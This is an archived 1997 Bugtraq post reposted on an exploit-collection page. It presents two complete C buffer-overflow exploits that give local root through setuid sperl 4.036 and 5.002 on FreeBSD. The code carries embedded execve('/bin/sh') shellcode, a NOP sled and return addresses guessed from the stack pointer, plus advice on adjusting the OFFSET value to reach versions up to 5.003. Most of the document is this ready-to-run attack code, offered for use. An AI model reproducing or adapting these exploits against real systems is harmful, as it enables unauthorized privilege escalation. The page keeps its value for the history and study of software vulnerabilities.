FreeBSD exploits for the Perl 5.003 (and earlier) overflow bug.

Summary
Description:Buffer overflow in Perl, already discussed in another entry. These are FreeBSD exploits for perl4.036, and 5.00X
Author:Deliver <deliver@FREE.POLBOX.PL> wrote the exploits
Compromise: root (local)
Vulnerable Systems:FreeBSD with vulnerable perl (Version <= 5.003) installed.
Date:21 April 1997
Details


Date: Mon, 21 Apr 1997 16:34:41 PDT
From: Deliver <deliver@FREE.POLBOX.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Exploits for FreeBSD sperl4.036 & sperl5.00x

  If somebody want to test perl5.00X or perl4.036 buffer overflow exploits
there are two for FreeBSD...

  First works on perl4.036 and the second on perl5.002 ...
With a little modyfication of OFFSET value you can overflow all versions up
to perl5.003

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl4.036 by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          600

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0+1;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768+1);
        memcpy(&buf[768+1],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}

------------cut-------------cut-------------cut------------cut------------
/************************************************************/
/*   Exploit for FreeBSD sperl5.00X by OVX                  */
/************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER_SIZE     1400
#define OFFSET          1000

char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
        int i;
        char execshell[] =
        "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        for(i=0;i<BUFFER_SIZE-4;i+=4)
          *(char **)&buf[i] = get_esp() - OFFSET;

        memset(buf,0x90,768);
        memcpy(&buf[768],execshell,strlen(execshell));

        buf[BUFFER_SIZE-1]=0;

        execl("/usr/bin/sperl5.002", "/usr/bin/sperl5.002", buf, NULL);
}
------------cut-------------cut-------------cut------------cut------------

PS: Pozdrowienia dla wszystkich polskich hackerow ...
//////////////////////////////////////////////////////////////////////////
// ANY QUESTIONS ?                                                      //
// OVX - deliver@free.polbox.pl                                         //
//////////////////////////////////////////////////////////////////////////

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault